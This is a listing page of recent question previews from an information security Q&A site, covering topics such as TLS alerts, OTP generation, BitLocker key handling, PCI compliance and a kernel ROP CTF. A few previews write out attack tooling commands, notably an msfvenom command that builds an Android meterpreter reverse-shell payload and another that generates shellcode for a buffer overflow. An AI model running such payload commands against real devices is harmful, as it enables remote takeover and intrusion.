Newest Questions
70,178 questions
0
votes
0
answers
6
views
Genymotion with burpsuite proxy setup failed
I'm using genymotion V3.9.0, i want to configure to use burpsuite proxy to capture traffic.
I've done steps mentioned in this blogpost:
https://medium.com/@mahmud0x/genymotion-proxying-android-app-...
- 11
1
vote
0
answers
19
views
Kernel panic during ROP chain: GDB stepping mismatch and unexpected register state
I am working on a Linux x64 kernel exploitation CTF challenge. I have constructed a ROP chain to execute commit_creds(prepare_kernel_cred(0)).
However, I am encountering a major inconsistency between ...
- 111
-2
votes
0
answers
28
views
Excel's Protected View protecting files with no macros? [closed]
I have downloaded an .xlsx file, and opened it in Excel 2021. It opened it in Protected View. Excel says, that editing the document may cause harm.
How?
Note, that an .xlsx cannot contain macros. Only ...
- 97
-1
votes
0
answers
26
views
how make custom.chr in john the ripper [closed]
I am on Windows 10, trying to create a custom.chr for rapid search of passwords with 7z extracted hash, but I'm unable to create custom.chr when using the command:
.\john.exe --make-charset=custom.chr
...
0
votes
0
answers
69
views
Is juice jacking still a feasible threat that can easily succeed?
The TSA has recently been issuing warnings about juice jacking. I've seen juice jacking frequently discussed. To my understanding, whenever a proof-of-concept for juice jacking is released, the OS ...
- 71
0
votes
0
answers
55
views
qbittorrent, did my IP leak? [closed]
I accidentally opened qbittorrent without VPN on, killswitch, app switch, and VPN was Off.
However as I have hundreds of torrents seeding and downloading, the checking process at startup, which shows ...
19
votes
8
answers
3k
views
Plausibility of a write-only hack of an employee database
I am writing a book, and in it, a character has hacked an employee database. They want to do two things: read and write. They want to see all the employees, but they also want to insert a new employee ...
- 291
-2
votes
0
answers
39
views
How do privilege escalation techniques differ between Windows and Linux systems? [closed]
I encountered privilege escalation modules while preparing for Certified Ethical Hacker Exam, but the exam material is often shallow. Most resources like Pass4Future give high-level explanations in ...
-4
votes
0
answers
61
views
Who is doing this? [closed]
I had this girl with access to my wifi router and out of nowhere she starts acting weird and my two T-Mobile phones both log me out of my emails and start doing things on their own.
I saw the little ...
2
votes
2
answers
76
views
PII data in Id_token (OIDC)
Is it a security risk to include sensitive PII such as date of birth, email address, and phone number directly in an OpenID Connect ID token (id_token)? My development team insists this aligns with ...
- 21
-1
votes
2
answers
138
views
Doesn't the fact that local .html files are able to access any file on the users hardddrive make opening them extremely dangerous?
I figured out recently that using this you can load any file stored on the users computer from a local html file:
// Create a new <img> element
let img = document.createElement('img');
// Set ...
- 403
0
votes
0
answers
37
views
GPG on MacOS: dirmngr unable to resolve keyserver URI, common causes ruled out, how to troubleshoot further? [migrated]
I've recently migrated to a new Macbook Pro where I'm having issues with gpg. The following issues occur only on the new laptop. I can't find any difference between the GPG configuration on the two ...
- 165
0
votes
0
answers
42
views
Is there any research on quantifying the security risks associated with certain design decisions. e.g. DMZ or No DMZ
I have an application that is designed to be installed in a distributed fashion (Firewall | WebApp in DMZ | Firewall | AppServer | DatabaseServer || Security), but which can also run if everything is ...
- 101
0
votes
1
answer
67
views
Should a server TLS Alert when the client selects an EC-based cipher but doesn't provide ec_point_formats?
Everything is mostly in the title. Just to add, this is in the context of TLS1.2. I ask because, I have a server where, if you force a cipher that utilizes EC but do not send an ec_point_formats ...
13
votes
3
answers
2k
views
Installing root certificates by government
The government of Kazakhstan, in order for citizens to use electronic government services (egov.kz), requires installing the NCALayer application on the computer for working with digital signatures. ...
- 131
1
vote
0
answers
30
views
How .got entry overriding works in heap overflow
I'm new to exploit dev. While reading about protostart heap1 exercise writeups, I came across guys overriding .got entry with value provided by user which lead to call function that supposed to be not ...
- 11
0
votes
2
answers
89
views
Understanding of Client Authentication Certificates for mTLS
A third party supplier of an mTLS protected service gave us the following requirement:
We were to obtain & share with them a client authentication certificate so their service can authenticate us
...
- 205
0
votes
0
answers
38
views
Securing Unity WebGL Games in ( web and mobile app) Against Unauthorized Extraction and Redistribution
Context:
Our organization develops educational applications for children that embed Unity WebGL games within mobile (flutter) and web platforms.
The games are fetched from our backend server and must ...
0
votes
1
answer
128
views
Does re-timestamping bring value?
My question is about the validity of eIDAS signatures, signed with the B-LTA level, if I do not re-timestamp when the TSA certificate expires.
Assume that the chain of certificates as well as ...
- 113
0
votes
1
answer
113
views
What security measures should websites take when using PINs over passwords?
I can think of obvious reasons why a website should use passwords over pins (entropy, etc.), but there is at least one very well-known British gambling website that uses pins over passwords, and, to ...
11
votes
4
answers
3k
views
Is user enumeration a problem for a passwordless app?
My company has implemented a passwordless login method. Our users input their email address and then receive a 6-character code over email, which they use to log in. There is no alternative login ...
0
votes
0
answers
63
views
How to properly assume an AWS IAM Role in an automated way from server sitting outside of cloud?
To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
- 161
1
vote
0
answers
49
views
Android msfvenom payload [closed]
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
- 11
0
votes
1
answer
156
views
MsfVenom generated shellcode fails when using it in buffer overflow
I use msfvenom generated shellcode in buffer overflow.
Here's command that I used to create shellcode for linux x64:
msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami
And here's ...
- 11
0
votes
1
answer
80
views
How to find out if CSP report is XSS vulnerability or malicious browser extension?
I have recently added CSP headers to a rather complex web application, being -report-only at first.
I got some noise from browser extensions in the report, but two incidents caught my eye especially:
...
- 419
1
vote
0
answers
35
views
Can a SIM card have malware and how can it spread? [duplicate]
I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also?
I saw that it can attack during a phone update download. If the update has downloaded ...
1
vote
0
answers
132
views
GPU speedup for PBKDF2 vs bcrypt vs Argon2
I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
- 305
1
vote
0
answers
110
views
VPN client on a router versus VPN client on a computer
Until now, I have been using VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
0
votes
0
answers
13
views
What is this path added by /etc/paths.d/10-pmk-global on macOS? [migrated]
I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global.
Usually, a system-related program would go in /...
- 402
0
votes
0
answers
44
views
Possible web form injection from ad triggering biometric prompt
This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
- 101
0
votes
1
answer
112
views
Is C#'s System.Web.Helpers.Crypto password-hashing still considered secure?
I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
- 109
0
votes
1
answer
237
views
File backup encryption for personal files
I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
- 113
5
votes
1
answer
852
views
Can you bypass PIN requirement of FIDO token protected LUKS device with hex editor?
I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
- 153
6
votes
1
answer
645
views
What is the difference between contactless Apple Pay and contactless card?
Apple claims that one time token is created. What is the purpose of that token? What happens with that token?
As far as I know when I pay with my physical debit card the information passed the POS ...
- 475
0
votes
1
answer
55
views
PCI applicability when only typing cc info into a client's payment system
My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future.
One potential client has us using their ...
7
votes
3
answers
2k
views
Does an SMS OTP have to be recreated for every message?
I use SMS for MFA (yes I know it's bad, but better than no MFA) in an web application.
On login an OTP is sent to the user via SMS.
This OTP is valid until:
it expires after 10 minutes
it is ...
- 173
0
votes
0
answers
25
views
Why is the raw log data parsed by Defender different from what is shown in the Defender console?
How does Defender for Cloud interpret and normalize these logs?
In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP.
...
- 1
0
votes
1
answer
69
views
Does qualified electronic signature require a certified middleware
When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform?
Does ...
- 101
1
vote
0
answers
55
views
How can I restrict IFEO vulnerability?
I have an application, myapplication.exe. Through IFEO registry I can attach a debugger, which can be a malicious piece of software for a attacker.
Only someone having access to Windows registry can ...
0
votes
0
answers
75
views
What is the appropriate incident-response procedure after a user clicks a phishing link without entering credentials? [duplicate]
A user accidentally clicked a link in a phishing email.
The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
- 101
0
votes
1
answer
120
views
How I can ensure that I have enough entropy in a base64 encoded byte string?
In php I am generating a unique random token used as a code and Index for password resets:
declare(strict_types=1);
namespace App\Domain\Helper;
use Ramsey\Uuid\Uuid;
use Random\RandomException;
...
0
votes
0
answers
4
views
How to analyse Android mobile memory? [migrated]
Is there any method to forensically analyse Android mobile memory without rooting the phone. I want to capture malware in my Android phone.
0
votes
3
answers
125
views
Generating OTP used in SMS and email
I am using the following approach for time limited OTP used in my php app using a pseudorandom generator:
$otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT);
Then upon the User I store:...
0
votes
0
answers
56
views
Does chocolatey provide cryptographic authentication and integrity validation?
Does the chocolatey package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them?
I usually trust my OS ...
- 1,196
0
votes
1
answer
47
views
Does cygwin provide cryptographic authentication and integrity validation?
Does the cygwin package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them?
Fortunately, it's possible to ...
- 1,196
3
votes
7
answers
3k
views
How to Protect Commercial Java Software Running on Client Machines?
I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
- 65
0
votes
0
answers
70
views
What is commonly done in embedded/IoT systems to encrypt flash storage? Is TPM, PUFs, eFUSEs, TEE used to get the decryption key?
Assuming that RAM is inside the SoC, nullifying the possibility of cold-boot attacks, the only other way to obtain the decryption key is to extract it from the secure storage in which it is saved.
I ...
- 537
0
votes
0
answers
42
views
Tokenized PAN & PCI DSS Compliance
I have been asked to implement a new payment system that uses Google/Apple Pay's Direct integration (using Tokenized PANs (DPAN), not clear cards) as well as a similar Tokenized PAN retrieved from our ...
- 1
0
votes
2
answers
210
views
How do embedded systems protect encryption keys when no user authentication is possible at startup?
Embedded and IoT systems power on autonomously, without user input (unlike PCs or phones requiring a PIN/password). If the manufacturer wants to encrypt the flash storage:
Must the decryption key be ...
- 537
2
votes
1
answer
211
views
Why does BitLocker keep the Volume Master Key (VMK) in plaintext RAM instead of inside a TEE?
I have two related questions about BitLocker’s key handling:
1)
After the system boots and BitLocker unlocks the drive, TPM releases the Volume Master Key (VMK) and from now on it is resident in ...
- 537